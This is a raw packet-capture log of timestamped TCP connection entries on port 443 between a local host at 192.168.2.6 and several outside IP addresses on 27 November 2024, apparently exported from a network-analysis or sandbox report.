                                                  Nov 27, 2024 18:09:41.589138985 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:41.589171886 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:41.589191914 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:41.675766945 CET49706443192.168.2.6142.250.181.100
                                                  Nov 27, 2024 18:09:41.675803900 CET44349706142.250.181.100192.168.2.6
                                                  Nov 27, 2024 18:09:41.727602005 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:41.727669001 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:41.727683067 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:41.727741957 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:41.727804899 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:42.614813089 CET4434973413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.615782976 CET49734443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:42.615818977 CET4434973413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.616517067 CET49734443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:42.616523027 CET4434973413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.668688059 CET4434973313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.669253111 CET49733443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:42.669286966 CET4434973313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.670140982 CET49733443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:42.670154095 CET4434973313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.693989038 CET4434973513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.694539070 CET49735443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:42.694566011 CET4434973513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.695100069 CET49735443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:42.695111990 CET4434973513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.726861954 CET4434973213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.727464914 CET49732443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:42.727487087 CET4434973213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.727979898 CET49732443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:42.727984905 CET4434973213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.783910036 CET4434973613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.784379005 CET49736443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:42.784420013 CET4434973613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.784889936 CET49736443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:42.784895897 CET4434973613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:42.834911108 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:42.834949970 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:42.834965944 CET49724443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:09:42.834973097 CET4434972420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:09:43.055974007 CET4434973413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.056041956 CET4434973413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.056102037 CET49734443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.056535959 CET49734443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.056556940 CET4434973413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.056571007 CET49734443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.056576967 CET4434973413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.060547113 CET49739443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.060580969 CET4434973913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.060635090 CET49739443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.061196089 CET49739443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.061209917 CET4434973913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.119735956 CET4434973313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.119805098 CET4434973313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.119863033 CET49733443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.120062113 CET49733443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.120080948 CET4434973313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.120100975 CET49733443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.120106936 CET4434973313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.123392105 CET49740443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.123430967 CET4434974013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.123493910 CET49740443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.123631001 CET49740443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.123646975 CET4434974013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.145020008 CET4434973513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.145086050 CET4434973513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.145132065 CET49735443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.145345926 CET49735443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.145361900 CET4434973513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.145374060 CET49735443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.145379066 CET4434973513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.148314953 CET49741443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.148345947 CET4434974113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.148479939 CET49741443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.148577929 CET49741443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.148591995 CET4434974113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.183003902 CET4434973213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.183065891 CET4434973213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.183146954 CET49732443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.183362007 CET49732443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.183372974 CET4434973213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.183383942 CET49732443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.183387995 CET4434973213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.186522007 CET49742443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.186562061 CET4434974213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.186652899 CET49742443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.186820030 CET49742443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.186834097 CET4434974213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.228631020 CET4434973613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.228699923 CET4434973613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.228760958 CET49736443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.229003906 CET49736443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.229023933 CET4434973613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.229038000 CET49736443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.229043007 CET4434973613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.232539892 CET49743443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.232580900 CET4434974313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:43.232690096 CET49743443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.232851028 CET49743443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:43.232863903 CET4434974313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:44.856476068 CET4434973913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:44.857517004 CET49739443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:44.857532978 CET4434973913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:44.859220982 CET49739443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:44.859225035 CET4434973913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:44.909090996 CET4434974213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:44.909626961 CET49742443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:44.909643888 CET4434974213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:44.910108089 CET49742443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:44.910114050 CET4434974213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:44.962831020 CET4434974013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:44.963392973 CET49740443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:44.963432074 CET4434974013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:44.963886023 CET49740443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:44.963892937 CET4434974013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.022305965 CET4434974113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.023041964 CET49741443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.023061037 CET4434974113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.023577929 CET49741443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.023582935 CET4434974113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.028649092 CET4434974313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.029083014 CET49743443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.029097080 CET4434974313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.029453039 CET49743443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.029457092 CET4434974313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.306236982 CET4434973913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.306299925 CET4434973913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.306385040 CET49739443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.306529999 CET49739443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.306546926 CET4434973913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.306560993 CET49739443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.306566000 CET4434973913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.309741974 CET49745443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.309784889 CET4434974513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.309856892 CET49745443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.310018063 CET49745443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.310029984 CET4434974513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.353837967 CET4434974213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.354048967 CET4434974213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.354224920 CET49742443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.354293108 CET49742443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.354312897 CET4434974213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.354325056 CET49742443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.354331970 CET4434974213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.356878042 CET49746443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.356913090 CET4434974613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.357001066 CET49746443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.357212067 CET49746443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.357222080 CET4434974613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.422735929 CET4434974013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.422797918 CET4434974013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.423012018 CET49740443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.423134089 CET49740443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.423134089 CET49740443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.423146963 CET4434974013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.423155069 CET4434974013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.427381039 CET49747443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.427428961 CET4434974713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.427483082 CET49747443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.427922010 CET49747443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.427937984 CET4434974713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.481204987 CET4434974313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.481281996 CET4434974313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.481460094 CET49743443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.481616020 CET49743443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.481637955 CET4434974313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.481650114 CET49743443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.481657982 CET4434974313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.482522011 CET4434974113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.482587099 CET4434974113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.482635021 CET49741443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.483026981 CET49741443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.483031034 CET4434974113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.483040094 CET49741443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.483046055 CET4434974113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.485850096 CET49748443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.485873938 CET4434974813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.485934019 CET49748443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.489053965 CET49749443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.489109039 CET4434974913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.489145041 CET49748443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.489159107 CET4434974813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:45.489181995 CET49749443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.489592075 CET49749443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:45.489607096 CET4434974913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:46.348459959 CET49750443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:46.348507881 CET4434975094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:46.348584890 CET49750443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:46.349011898 CET49751443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:46.349051952 CET4434975194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:46.349097013 CET49751443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:46.349288940 CET49750443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:46.349303961 CET4434975094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:46.349494934 CET49751443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:46.349505901 CET4434975194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:47.148991108 CET4434974713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.149486065 CET49747443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.149530888 CET4434974713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.151189089 CET49747443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.151195049 CET4434974713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.185023069 CET4434974613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.185612917 CET49746443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.185628891 CET4434974613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.186067104 CET49746443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.186072111 CET4434974613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.206702948 CET4434974513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.207209110 CET49745443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.207227945 CET4434974513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.207632065 CET49745443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.207637072 CET4434974513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.220412016 CET4434974813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.221102953 CET49748443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.221122980 CET4434974813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.221584082 CET49748443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.221587896 CET4434974813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.337510109 CET4434974913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.338129044 CET49749443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.338160038 CET4434974913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.338609934 CET49749443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.338624954 CET4434974913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.586930990 CET4434974713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.587001085 CET4434974713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.587059975 CET49747443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.587268114 CET49747443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.587292910 CET4434974713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.587304115 CET49747443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.587308884 CET4434974713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.590398073 CET49752443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.590451956 CET4434975213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.590552092 CET49752443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.590722084 CET49752443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.590735912 CET4434975213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.633057117 CET4434974613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.633121967 CET4434974613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.633176088 CET49746443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.633361101 CET49746443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.633375883 CET4434974613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.633384943 CET49746443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.633393049 CET4434974613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.636605978 CET49753443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.636656046 CET4434975313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.636740923 CET49753443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.636912107 CET49753443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.636928082 CET4434975313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.658962011 CET4434974813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.659038067 CET4434974813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.659104109 CET49748443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.659302950 CET49748443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.659327030 CET4434974813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.659339905 CET49748443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.659346104 CET4434974813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.664386034 CET4434974513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.664457083 CET4434974513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.664524078 CET49745443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.668170929 CET49745443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.668200970 CET4434974513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.668215036 CET49745443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.668221951 CET4434974513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.670723915 CET49754443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.670747042 CET49755443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.670762062 CET4434975413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.670774937 CET4434975513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.670842886 CET49754443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.671032906 CET49755443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.671032906 CET49754443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.671032906 CET49755443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.671046019 CET4434975413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.671061039 CET4434975513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.753943920 CET4434975194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:47.754214048 CET49751443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:47.754225016 CET4434975194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:47.755259037 CET4434975194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:47.755758047 CET49751443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:47.756917953 CET49751443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:47.756987095 CET4434975194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:47.757175922 CET49751443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:47.757184029 CET4434975194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:47.801327944 CET4434974913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.801409006 CET4434974913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.801484108 CET49749443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.801685095 CET49749443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.801707983 CET4434974913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.801719904 CET49749443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.801723957 CET4434974913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.801820040 CET49751443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:47.805032969 CET49756443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.805094004 CET4434975613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.805165052 CET49756443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.805319071 CET49756443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:47.805339098 CET4434975613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:47.809212923 CET4434975094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:47.809480906 CET49750443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:47.809500933 CET4434975094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:47.810585976 CET4434975094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:47.810647011 CET49750443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:47.810988903 CET49750443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:47.811062098 CET4434975094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:47.864140987 CET49750443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:47.864175081 CET4434975094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:47.910784006 CET49750443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:48.301875114 CET4434975194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:48.301966906 CET4434975194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:48.302084923 CET49751443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:48.417268991 CET49751443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:48.417298079 CET4434975194.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:49.196192026 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:49.196227074 CET4434975794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:49.196305037 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:49.196540117 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:49.196556091 CET4434975794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:49.325448036 CET4434975213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.326092005 CET49752443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.326124907 CET4434975213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.326591015 CET49752443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.326596022 CET4434975213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.441466093 CET4434975313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.442138910 CET49753443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.442168951 CET4434975313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.442611933 CET49753443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.442616940 CET4434975313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.464498043 CET4434975513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.464958906 CET49755443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.464977026 CET4434975513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.465375900 CET49755443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.465380907 CET4434975513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.569576025 CET4434975413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.570207119 CET49754443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.570249081 CET4434975413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.570708036 CET49754443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.570714951 CET4434975413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.686942101 CET4434975613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.687825918 CET49756443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.687864065 CET4434975613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.688304901 CET49756443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.688309908 CET4434975613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.762649059 CET4434975213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.762742043 CET4434975213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.762811899 CET49752443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.763071060 CET49752443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.763087988 CET4434975213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.763098955 CET49752443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.763112068 CET4434975213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.766488075 CET49758443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.766532898 CET4434975813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.766643047 CET49758443192.168.2.613.107.246.63
